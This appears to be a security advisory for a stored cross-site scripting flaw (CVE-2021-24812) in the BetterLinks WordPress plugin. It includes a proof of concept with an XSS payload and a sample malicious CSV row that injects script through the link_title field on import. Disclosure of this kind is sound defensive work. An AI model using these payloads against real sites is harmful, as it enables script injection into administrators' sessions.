BetterLinks < 1.2.6 – Admin+ Stored Cross-Site Scripting | CVE 2021-24812

Description

The plugin does not sanitise and escape some of imported link fields, which could lead to Stored Cross-Site Scripting issues when an admin import a malicious CSV.

Proof of Concept

Go to Plugin's Settings page, in "Tool" tab, import a CSV file with Betterlinks option. Put a simple XSS payload into "link_title" column in the csv file: title"><img src onerror=alert('xss')>

The XSS will be triggered when accessing Manage Links page.

Example of malicious CSV:

ID,link_author,link_date,link_date_gmt,link_title,link_slug,link_note,link_status,nofollow,sponsored,track_me,param_forwarding,param_struct,redirect_type,target_url,short_url,link_order,link_modified,link_modified_gmt,wildcards,expire,dynamic_redirect,tags,category
1,1,"2021-10-01 12:48:35","2021-10-01 12:48:35",\"><img/src/onerror=alert(/XSSS/)>,slug,note,publish,1,,1,,,307,https://example.com/aaa,go/xss,0,"2021-10-01 12:48:35","2021-10-01 12:48:35",0,,,,uncategorized